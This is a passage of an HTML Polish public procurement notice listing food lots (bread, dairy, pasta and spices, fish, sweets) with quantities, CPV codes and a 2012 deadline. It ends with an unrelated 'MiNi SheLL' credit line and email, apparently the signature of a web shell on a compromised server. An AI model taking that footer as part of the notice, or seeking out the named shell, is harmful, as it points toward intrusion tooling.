<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op. szt. 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display	szt. 10 Wafle kakaowe  b czekolady (typu:Grześki) 30 szt op display szt. 20 Wafle śmietankowe 3,2 kg op. szt. 3 Biszkopty 120g op. szt. 100 Baton mleczny 23,5g 30szt op display szt. 20 Draże różne smaki 100g op. szt. 250 Batoniki nadziewane masą w mlecznej czekoladzie różne smaki 45g  24szt. op.	szt. 10 Figurki czekoladowe -mikołaje szt. 280.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> TABELA F* PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jedn. miary Ilość Chleb baltonowski krojony 0,6 kg szt. 1600 Chleb razowy 0,5 kg litewski szt. 400 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg szt. 600 Drożdżówki szt. 500 Bułka tarta 1 kg szt. 50 Babka okrągła średnia 0,5kg szt. 50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> 50  TABELA G*  NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Śmietana 12% słodka 0,5l  kartonik szt. 130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 400 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 60 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie   szt. 1800 Mleko 2% folia 0,9l op. szt. 1200 Serdelek topiony kiełbaski 100g szt. 150 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50 Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 10 Jogurt smakowy 125g szt. 1200 Śmietanka kremowa 36% 0,5l szt. 20 Margaryna zwykła 250g  szt. 220 Masło śmietankowe 200g op. zaw. 86%tł. szt. 1700.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 03.20.00.00-3, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> TABELA H* MAKARONY I PRZYPRAWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Sos pieczeniowy 3kg op. szt. 2 Majeranek 0,25kg op. szt. 5 Delikat do mięs i innych potraw 600g op.  szt. 3 Delikat do drobiu 600g op. szt. 3 Delikat do mięs 4,8 kg op. szt. 1 Delikat do ryb 600g op. szt. 1 Przyprawa szefa kuchni 1kg op. szt. 5 Makaron świderki, 100% pszenicy Durum 3kgop. szt.27Makaron nitki 100% pszenicy Durum 3kgop. szt.5 Makaron rurki 100% pszenicy Durum 3kgop. szt.6 Makaron koła 100% pszenicy Durum 3kgop. szt.27 Makaron łazanki 100% pszenicy Durum 3kgop. szt.18 Makaron kokardki 100% pszenicy Durum 3kgop. szt.27 Napoj 1kg mix  szt. 100 Sos myśliwski 1,1 kg op. szt 2 Herbata granulowana 0,9 kg op. szt. 60Papryka słodka syp. 0,5kgszt.2 Pieprz mielony 0,5 kg szt. 3 Przyprawa w płynie 1l szt.3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> TABELA  I*  RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa towaru Jednostka miary Ilość Ryby mrożone filet z Pangi kg op. kg 60 Ryby mrożone filet z mintaja kg op. kg 60 Ryby wiadro płaty śledziowe ocet 2,5 kgop.szt.4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com